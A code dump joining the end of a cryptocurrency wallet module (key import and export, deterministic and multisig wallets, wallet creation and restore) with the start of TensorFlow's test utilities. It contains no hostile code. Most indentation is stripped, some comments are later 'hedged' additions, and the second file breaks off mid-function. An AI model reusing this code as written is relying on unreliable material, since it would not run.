else:
self.keystore = Imported_KeyStore({})
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
def load_addresses(self):
pass
def save_addresses(self):
pass
def can_change_password(self):
return True
def can_import_address(self):
return False
def get_addresses(self, include_change=False):
return self.keystore.get_addresses()
def delete_address_derived(self, address):
self.keystore.remove_address(address)
self.save_keystore()
def get_address_index(self, address):
return self.get_public_key(address)
def get_public_key(self, address):
return self.keystore.address_to_pubkey(address)
def import_private_key(self, sec, pw):
pubkey = self.keystore.import_privkey(sec, pw)
self.save_keystore()
self.add_address(pubkey.address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if above already wrote
return pubkey.address.to_ui_string()
def export_private_key(self, address, password):
'''Returned in WIF format.'''
pubkey = self.keystore.address_to_pubkey(address)
return self.keystore.export_private_key(pubkey, password)
def add_input_sig_info(self, txin, address):
assert txin['type'] == 'p2pkh'
pubkey = self.keystore.address_to_pubkey(address)
txin['num_sig'] = 1
txin['x_pubkeys'] = [pubkey.to_ui_string()]
txin['signatures'] = [None]
def pubkeys_to_address(self, pubkey):
pubkey = PublicKey.from_string(pubkey)
if pubkey in self.keystore.keypairs:
return pubkey.address
class Deterministic_Wallet(Abstract_Wallet):
def __init__(self, storage):
Abstract_Wallet.__init__(self, storage)
self.gap_limit = storage.get('gap_limit', 20)
def has_seed(self):
return self.keystore.has_seed()
def get_receiving_addresses(self):
return self.receiving_addresses
def get_change_addresses(self):
return self.change_addresses
def get_seed(self, password):
return self.keystore.get_seed(password)
def add_seed(self, seed, pw):
self.keystore.add_seed(seed, pw)
def change_gap_limit(self, value):
'''This method is not called in the code, it is kept for console use'''
with self.lock:
if value >= self.gap_limit:
self.gap_limit = value
self.storage.put('gap_limit', self.gap_limit)
return True
elif value >= self.min_acceptable_gap():
addresses = self.get_receiving_addresses()
k = self.num_unused_trailing_addresses(addresses)
n = len(addresses) - k + value
self.receiving_addresses = self.receiving_addresses[0:n]
self.gap_limit = value
self.storage.put('gap_limit', self.gap_limit)
self.save_addresses()
return True
else:
return False
def num_unused_trailing_addresses(self, addresses):
'''This method isn't called anywhere. Perhaps it is here for console use.
Can't be sure. -Calin '''
with self.lock:
k = 0
for addr in reversed(addresses):
if addr in self._history:
break
k = k + 1
return k
def min_acceptable_gap(self):
''' Caller needs to hold self.lock otherwise bad things may happen. '''
# fixme: this assumes wallet is synchronized
n = 0
nmax = 0
addresses = self.get_receiving_addresses()
k = self.num_unused_trailing_addresses(addresses)
for a in addresses[0:-k]:
if a in self._history:
n = 0
else:
n += 1
if n > nmax: nmax = n
return nmax + 1
def create_new_address(self, for_change=False):
for_change = bool(for_change)
with self.lock:
addr_list = self.change_addresses if for_change else self.receiving_addresses
n = len(addr_list)
x = self.derive_pubkeys(for_change, n)
address = self.pubkeys_to_address(x)
addr_list.append(address)
self.save_addresses()
self.add_address(address)
return address
def synchronize_sequence(self, for_change):
limit = self.gap_limit_for_change if for_change else self.gap_limit
while True:
addresses = self.get_change_addresses() if for_change else self.get_receiving_addresses()
if len(addresses) < limit:
self.create_new_address(for_change)
continue
if all(map(lambda a: not self.address_is_old(a), addresses[-limit:] )):
break
else:
self.create_new_address(for_change)
def synchronize(self):
with self.lock:
self.synchronize_sequence(False)
self.synchronize_sequence(True)
def is_beyond_limit(self, address, is_change):
with self.lock:
if is_change:
addr_list = self.get_change_addresses()
limit = self.gap_limit_for_change
else:
addr_list = self.get_receiving_addresses()
limit = self.gap_limit
idx = addr_list.index(address)
if idx < limit:
return False
for addr in addr_list[-limit:]:
if addr in self._history:
return False
return True
def get_master_public_keys(self):
return [self.get_master_public_key()]
def get_fingerprint(self):
return self.get_master_public_key()
def get_txin_type(self, address):
return self.txin_type
class Simple_Deterministic_Wallet(Simple_Wallet, Deterministic_Wallet):
""" Deterministic Wallet with a single pubkey per address """
def __init__(self, storage):
Deterministic_Wallet.__init__(self, storage)
def get_public_key(self, address):
sequence = self.get_address_index(address)
pubkey = self.get_pubkey(*sequence)
return pubkey
def load_keystore(self):
self.keystore = load_keystore(self.storage, 'keystore')
try:
xtype = bitcoin.xpub_type(self.keystore.xpub)
except:
xtype = 'standard'
self.txin_type = 'p2pkh' if xtype == 'standard' else xtype
def get_pubkey(self, c, i):
return self.derive_pubkeys(c, i)
def get_public_keys(self, address):
return [self.get_public_key(address)]
def add_input_sig_info(self, txin, address):
derivation = self.get_address_index(address)
x_pubkey = self.keystore.get_xpubkey(*derivation)
txin['x_pubkeys'] = [x_pubkey]
txin['signatures'] = [None]
txin['num_sig'] = 1
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def derive_pubkeys(self, c, i):
return self.keystore.derive_pubkey(c, i)
class Standard_Wallet(Simple_Deterministic_Wallet):
wallet_type = 'standard'
def pubkeys_to_address(self, pubkey):
return Address.from_pubkey(pubkey)
class Multisig_Wallet(Deterministic_Wallet):
# generic m of n
gap_limit = 20
def __init__(self, storage):
self.wallet_type = storage.get('wallet_type')
self.m, self.n = multisig_type(self.wallet_type)
Deterministic_Wallet.__init__(self, storage)
def get_pubkeys(self, c, i):
return self.derive_pubkeys(c, i)
def pubkeys_to_address(self, pubkeys):
pubkeys = [bytes.fromhex(pubkey) for pubkey in pubkeys]
redeem_script = self.pubkeys_to_redeem_script(pubkeys)
return Address.from_multisig_script(redeem_script)
def pubkeys_to_redeem_script(self, pubkeys):
return Script.multisig_script(self.m, sorted(pubkeys))
def derive_pubkeys(self, c, i):
return [k.derive_pubkey(c, i) for k in self.get_keystores()]
def load_keystore(self):
self.keystores = {}
for i in range(self.n):
name = 'x%d/'%(i+1)
self.keystores[name] = load_keystore(self.storage, name)
self.keystore = self.keystores['x1/']
xtype = bitcoin.xpub_type(self.keystore.xpub)
self.txin_type = 'p2sh' if xtype == 'standard' else xtype
def save_keystore(self):
for name, k in self.keystores.items():
self.storage.put(name, k.dump())
def get_keystore(self):
return self.keystores.get('x1/')
def get_keystores(self):
return [self.keystores[i] for i in sorted(self.keystores.keys())]
def update_password(self, old_pw, new_pw, encrypt=False):
if old_pw is None and self.has_password():
raise InvalidPassword()
for name, keystore in self.keystores.items():
if keystore.can_change_password():
keystore.update_password(old_pw, new_pw)
self.storage.put(name, keystore.dump())
self.storage.set_password(new_pw, encrypt)
self.storage.write()
def has_seed(self):
return self.keystore.has_seed()
def can_change_password(self):
return self.keystore.can_change_password()
def is_watching_only(self):
return not any([not k.is_watching_only() for k in self.get_keystores()])
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def get_master_public_keys(self):
return [k.get_master_public_key() for k in self.get_keystores()]
def get_fingerprint(self):
return ''.join(sorted(self.get_master_public_keys()))
def add_input_sig_info(self, txin, address):
# x_pubkeys are not sorted here because it would be too slow
# they are sorted in transaction.get_sorted_pubkeys
derivation = self.get_address_index(address)
txin['x_pubkeys'] = [k.get_xpubkey(*derivation) for k in self.get_keystores()]
txin['pubkeys'] = None
# we need n place holders
txin['signatures'] = [None] * self.n
txin['num_sig'] = self.m
def is_multisig(self):
return True
wallet_types = ['standard', 'multisig', 'imported']
def register_wallet_type(category):
wallet_types.append(category)
wallet_constructors = {
'standard': Standard_Wallet,
'old': Standard_Wallet,
'xpub': Standard_Wallet,
'imported_privkey': ImportedPrivkeyWallet,
'imported_addr': ImportedAddressWallet,
}
def register_constructor(wallet_type, constructor):
wallet_constructors[wallet_type] = constructor
class UnknownWalletType(RuntimeError):
''' Raised if encountering an unknown wallet type '''
pass
# former WalletFactory
class Wallet:
"""The main wallet "entry point".
This class is actually a factory that will return a wallet of the correct
type when passed a WalletStorage instance."""
def __new__(self, storage):
wallet_type = storage.get('wallet_type')
WalletClass = Wallet.wallet_class(wallet_type)
wallet = WalletClass(storage)
# Convert hardware wallets restored with older versions of
# Electrum to BIP44 wallets. A hardware wallet does not have
# a seed and plugins do not need to handle having one.
rwc = getattr(wallet, 'restore_wallet_class', None)
if rwc and storage.get('seed', ''):
storage.print_error("converting wallet type to " + rwc.wallet_type)
storage.put('wallet_type', rwc.wallet_type)
wallet = rwc(storage)
return wallet
@staticmethod
def wallet_class(wallet_type):
if multisig_type(wallet_type):
return Multisig_Wallet
if wallet_type in wallet_constructors:
return wallet_constructors[wallet_type]
raise UnknownWalletType("Unknown wallet type: " + str(wallet_type))
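# Hedged illustration (not from the original project): how third-party code
# might hook a new wallet type into the factory machinery above. The names
# 'mycustom' and MyCustomWallet are placeholders invented for this sketch.
#
#     class MyCustomWallet(Standard_Wallet):
#         wallet_type = 'mycustom'
#
#     register_wallet_type('mycustom')
#     register_constructor('mycustom', MyCustomWallet)
#
# Afterwards, Wallet(storage) resolves a storage whose 'wallet_type' is
# 'mycustom' to MyCustomWallet via Wallet.wallet_class().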
def create_new_wallet(*, path, config, passphrase=None, password=None,
encrypt_file=True, seed_type=None, gap_limit=None) -> dict:
"""Create a new wallet"""
storage = WalletStorage(path)
if storage.file_exists():
raise Exception("Remove the existing wallet first!")
from .mnemonic import Mnemonic_Electrum, Mnemonic
if seed_type == 'electrum':
seed = Mnemonic_Electrum('en').make_seed()
else:
seed = Mnemonic('en').make_seed()
k = keystore.from_seed(seed, passphrase, seed_type = seed_type)
storage.put('keystore', k.dump())
storage.put('wallet_type', 'standard')
storage.put('seed_type', seed_type)
if gap_limit is not None:
storage.put('gap_limit', gap_limit)
wallet = Wallet(storage)
wallet.update_password(old_pw=None, new_pw=password, encrypt=encrypt_file)
wallet.synchronize()
msg = "Please keep your seed in a safe place; if you lose it, you will not be able to restore your wallet."
wallet.storage.write()
return {'seed': seed, 'wallet': wallet, 'msg': msg}
def restore_wallet_from_text(text, *, path, config,
passphrase=None, password=None, encrypt_file=True,
gap_limit=None) -> dict:
"""Restore a wallet from text. Text can be a seed phrase, a master
public key, a master private key, a list of bitcoin addresses
or bitcoin private keys."""
storage = WalletStorage(path)
if storage.file_exists():
raise Exception("Remove the existing wallet first!")
text = text.strip()
if keystore.is_address_list(text):
wallet = ImportedAddressWallet.from_text(storage, text)
wallet.save_addresses()
    elif keystore.is_private_key_list(text):
k = keystore.Imported_KeyStore({})
storage.put('keystore', k.dump())
wallet = ImportedPrivkeyWallet.from_text(storage, text, password)
else:
if keystore.is_master_key(text):
k = keystore.from_master_key(text)
elif keystore.is_seed(text):
k = keystore.from_seed(text, passphrase) # auto-detects seed type, preference order: old, electrum, bip39
else:
raise Exception("Seed or key not recognized")
storage.put('keystore', k.dump())
storage.put('wallet_type', 'standard')
seed_type = getattr(k, 'seed_type', None)
if seed_type:
storage.put('seed_type', seed_type) # Save, just in case
if gap_limit is not None:
storage.put('gap_limit', gap_limit)
wallet = Wallet(storage)
wallet.update_password(old_pw=None, new_pw=password, encrypt=encrypt_file)
wallet.synchronize()
msg = ("This wallet was restored offline. It may contain more addresses than displayed. "
"Start a daemon and use load_wallet to sync its history.")
wallet.storage.write()
return {'wallet': wallet, 'msg': msg}
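# Hedged usage sketch (not part of the original module): creating and restoring
# wallets with the helpers above. The path '/tmp/demo_wallet', the password and
# the SimpleConfig import are assumptions made purely for illustration.
#
#     from .simple_config import SimpleConfig  # assumed import path
#     config = SimpleConfig()
#
#     d = create_new_wallet(path='/tmp/demo_wallet', config=config,
#                           password='correct horse', encrypt_file=True)
#     print(d['msg'])          # reminder to back up the seed
#     seed = d['seed']
#
#     d2 = restore_wallet_from_text(seed, path='/tmp/demo_wallet_restored',
#                                   config=config, password='correct horse')
#     wallet = d2['wallet']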
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import gc
import math
import random
import re
import tempfile
import threading
import numpy as np
import six
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error:
_portpicker_import_error = _error
portpicker = None
# pylint: disable=g-import-not-at-top
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.eager import tape # pylint: disable=unused-import
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util import nest
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.tf_export import tf_export
@tf_export("test.gpu_device_name")
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU" or x.device_type == "SYCL":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
@tf_export("test.assert_equal_graph_def")
def assert_equal_graph_def(actual, expected, checkpoint_v2=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError(
"Expected tf.GraphDef for actual, got %s" % type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError(
"Expected tf.GraphDef for expected, got %s" % type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
diff = pywrap_tensorflow.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(
len(a_value.bytes_list.value), len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
      tester.assertEqual(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
# Check the graph_defs.
assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
# Check graph_def versions (ignored by assert_equal_graph_def).
tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("graph_def")
b.ClearField("graph_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, str(attr_tensor_string_value))):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return pywrap_tensorflow.IsGoogleCudaEnabled()
def CudaSupportsHalfMatMulAndConv():
return pywrap_tensorflow.CudaSupportsHalfMatMulAndConv()
def IsMklEnabled():
return pywrap_tensorflow.IsMklEnabled()
def InstallStackTraceHandler():
pywrap_tensorflow.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
# TODO(skyewm): remove this eventually
# pylint: disable=protected-access
def _use_c_api_wrapper(fn, use_c_api, *args, **kwargs):
prev_value = ops._USE_C_API
ops._USE_C_API = use_c_api
try:
# Reset the default graph so it has the C API enabled. We call
# reset_default_graph() instead of creating a new default Graph context to
# make this robust to tests that call reset_default_graph(), which requires
# that the current default graph isn't nested.
ops.reset_default_graph()
fn(*args, **kwargs)
finally:
ops._USE_C_API = prev_value
# Make sure default graph reflects prev_value in case next test doesn't call
# reset_default_graph().
ops.reset_default_graph()
# pylint: disable=protected-access
def c_api_and_cuda_enabled():
return ops._USE_C_API and IsGoogleCudaEnabled()
def skip_if(condition):
"""Skips the decorated function if condition is or evaluates to True.
Args:
condition: Either an expression that can be used in "if not condition"
statement, or a callable whose result should be a boolean.
Returns:
The wrapped function
"""
def real_skip_if(fn):
def wrapper(*args, **kwargs):
if callable(condition):
skip = condition()
else:
skip = condition
if not skip:
fn(*args, **kwargs)
return wrapper
return real_skip_if
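# Hedged usage sketch for `skip_if` (the test class below is illustrative, not
# part of this module):
#
#   class GpuOnlyTest(TensorFlowTestCase):
#
#     @skip_if(lambda: not is_gpu_available())
#     def testRunsOnlyWithGpu(self):
#       ...  # body is not executed on machines without a GPU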
# TODO(skyewm): remove this eventually
def disable_c_api(fn):
"""Decorator for disabling the C API on a test.
Note this disables the C API after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
_use_c_api_wrapper(fn, False, *args, **kwargs)
return wrapper
# TODO(skyewm): remove this eventually
def enable_c_api(fn):
"""Decorator for enabling the C API on a test.
Note this enables the C API after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
_use_c_api_wrapper(fn, True, *args, **kwargs)
return wrapper
def enable_c_shapes(fn):
"""Decorator for enabling C shapes on a test.
Note this enables the C shapes after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
prev_value = ops._USE_C_SHAPES
# Only use C shapes if the C API is already enabled.
ops._USE_C_SHAPES = ops._USE_C_API
try:
fn(*args, **kwargs)
finally:
ops._USE_C_SHAPES = prev_value
return wrapper
# This decorator is a hacky way to run all the test methods in a decorated
# class with and without C API enabled.
# TODO(iga): Remove this and its uses once we switch to using C API by default.
def with_c_api(cls):
"""Adds methods that call original methods but with C API enabled.
Note this enables the C API in new methods after running the test class's
setup method. This can be a problem if some objects are created in it
before the C API is enabled.
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
# If the C API is already enabled, don't do anything. Some tests break if the
# same test is run twice, so this allows us to turn on the C API by default
# without breaking these tests.
if ops._USE_C_API: return cls
for name, value in cls.__dict__.copy().items():
if callable(value) and name.startswith("test"):
setattr(cls, name + "WithCApi", enable_c_api(value))
return cls
def assert_no_new_pyobjects_executing_eagerly(f):
"""Decorator for asserting that no new Python objects persist after a test.
Runs the test multiple times executing eagerly, first as a warmup and then
several times to let objects accumulate. The warmup helps ignore caches which
do not grow as the test is run repeatedly.
Useful for checking that there are no missing Py_DECREFs in the C exercised by
a bit of Python.
"""
def decorator(self, **kwargs):
"""Warms up, gets an object count, runs the test, checks for new objects."""
with context.eager_mode():
gc.disable()
f(self, **kwargs)
gc.collect()
previous_count = len(gc.get_objects())
for _ in range(3):
f(self, **kwargs)
gc.collect()
# There should be no new Python objects hanging around.
new_count = len(gc.get_objects())
self.assertEqual(previous_count, new_count)
gc.enable()
return decorator
def assert_no_new_tensors(f):
"""Decorator for asserting that no new Tensors persist after a test.
Mainly useful for checking that code using the Python C API has correctly
manipulated reference counts.
Clears the caches that it knows about, runs the garbage collector, then checks
that there are no Tensor or Tensor-like objects still around. This includes
Tensors to which something still has a reference (e.g. from missing
Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
of the objects has __del__ defined).
Args:
f: The test case to run.
Returns:
The decorated test case.
"""
def decorator(self, **kwargs):
"""Finds existing Tensors, runs the test, checks for new Tensors."""
def _is_tensorflow_object(obj):
try:
return isinstance(obj, (
ops.Tensor,
variables.Variable,
tensor_shape.Dimension,
tensor_shape.TensorShape))
except ReferenceError:
# If the object no longer exists, we don't care about it.
return False
tensors_before = set(id(obj) for obj in gc.get_objects()
if _is_tensorflow_object(obj))
outside_graph_key = ops.get_default_graph()._graph_key
with ops.Graph().as_default():
# Run the test in a new graph so that collections get cleared when it's
# done, but inherit the graph key so optimizers behave.
ops.get_default_graph()._graph_key = outside_graph_key
f(self, **kwargs)
# Make an effort to clear caches, which would otherwise look like leaked
# Tensors.
backprop._zeros_cache.flush()
context.get_default_context().ones_rank_cache().flush()
context.get_default_context().scalar_cache().clear()
gc.collect()
tensors_after = [
obj for obj in gc.get_objects()
if _is_tensorflow_object(obj) and id(obj) not in tensors_before
]
if tensors_after:
raise AssertionError(("%d Tensors not deallocated after test: %s" % (
len(tensors_after),
str(tensors_after),
)))
return decorator
def assert_no_garbage_created(f):
"""Test method decorator to assert that no garbage has been created.
Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
cannot be un-set (i.e. will disable garbage collection for any other unit
tests in the same file/shard).
Args:
f: The function to decorate.
Returns:
The decorated function.
"""
def decorator(self, **kwargs):
"""Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
gc.disable()
previous_debug_flags = gc.get_debug()
gc.set_debug(gc.DEBUG_SAVEALL)
gc.collect()
previous_garbage = len(gc.garbage)
f(self, **kwargs)
gc.collect()
if len(gc.garbage) > previous_garbage:
logging.error(
"The decorated test created work for Python's garbage collector, "
"likely due to a reference cycle. New objects in cycle(s):")
for i, obj in enumerate(gc.garbage[previous_garbage:]):
try:
logging.error(
"Object %d of %d" % (i, len(gc.garbage) - previous_garbage))
def _safe_object_str(obj):
return "<%s %d>" % (obj.__class__.__name__, id(obj))
logging.error(" Object type: %s" % (_safe_object_str(obj),))
logging.error(" Referrer types: %s" % (
', '.join([_safe_object_str(ref)
for ref in gc.get_referrers(obj)]),))
logging.error(" Referent types: %s" % (
', '.join([_safe_object_str(ref)
for ref in gc.get_referents(obj)]),))
logging.error(" Object attribute names: %s" % (dir(obj),))
logging.error(" Object __str__:")
logging.error(obj)
logging.error(" Object __repr__:")
logging.error(repr(obj))
except Exception:
logging.error("(Exception while printing object)")
# This will fail if any garbage has been created, typically because of a
# reference cycle.
self.assertEqual(previous_garbage, len(gc.garbage))
# TODO(allenl): Figure out why this debug flag reset doesn't work. It would
# be nice to be able to decorate arbitrary tests in a large test suite and
# not hold on to every object in other tests.
gc.set_debug(previous_debug_flags)
gc.enable()
return decorator
def run_in_graph_and_eager_modes(__unused__=None,
graph=None,
config=None,
use_gpu=False,
force_gpu=False,
reset_test=True,
assert_no_eager_garbage=False):
"""Runs the test in both graph and eager modes.
Args:
    __unused__: Prevents silently skipping tests.
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
reset_test: If True, tearDown and SetUp the test case again.
assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
collector and asserts that no extra garbage has been created when running
the test in eager mode. This will fail if there are reference cycles
(e.g. a = []; a.append(a)). Off by default because some tests may create
garbage for legitimate reasons (e.g. they define a class which inherits
from `object`), and because DEBUG_SAVEALL is sticky in some Python
interpreters (meaning that tests which rely on objects being collected
elsewhere in the unit test file will not work). Additionally, checks that
nothing still has a reference to Tensors that the test allocated.
Returns:
Returns a decorator that will run the decorated test function
using both a graph and using eager execution.
"""
assert not __unused__, "Add () after run_in_graph_and_eager_modes."
def decorator(f):
"""Test method decorator."""
def decorated(self, **kwargs):
"""Decorated the test method."""
with context.graph_mode():
with self.test_session(graph, config, use_gpu, force_gpu):
f(self, **kwargs)
if reset_test:
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self._tempdir = None
self.setUp()
def run_eager_mode(self, **kwargs):
if force_gpu:
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with context.device(gpu_name):
f(self)
elif use_gpu:
# TODO(xpan): Support softplacement and gpu by default when available.
f(self, **kwargs)
else:
with context.device("/device:CPU:0"):
f(self, **kwargs)
if assert_no_eager_garbage:
run_eager_mode = assert_no_new_tensors(
assert_no_garbage_created(run_eager_mode))
with context.eager_mode():
with ops.Graph().as_default():
run_eager_mode(self, **kwargs)
return decorated
return decorator
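# Hedged usage sketch for `run_in_graph_and_eager_modes` (the test below is
# illustrative only; `constant_op` is assumed importable as in other test
# files):
#
#   from tensorflow.python.framework import constant_op
#
#   class AdditionTest(TensorFlowTestCase):
#
#     @run_in_graph_and_eager_modes()
#     def testAdd(self):
#       x = constant_op.constant([1.0, 2.0])
#       # self.evaluate() works on both graph tensors and EagerTensors.
#       self.assertAllClose([2.0, 4.0], self.evaluate(x + x))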
@tf_export("test.is_gpu_available")
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Args:
cuda_only: limit the search to CUDA gpus.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Returns:
True iff a gpu device of the requested kind is available.
"""
def compute_capability_from_device_desc(device_desc):
# TODO(jingyue): The device description generator has to be in sync with
# this file. Another option is to put compute capability in
# DeviceAttributes, but I avoided that to keep DeviceAttributes
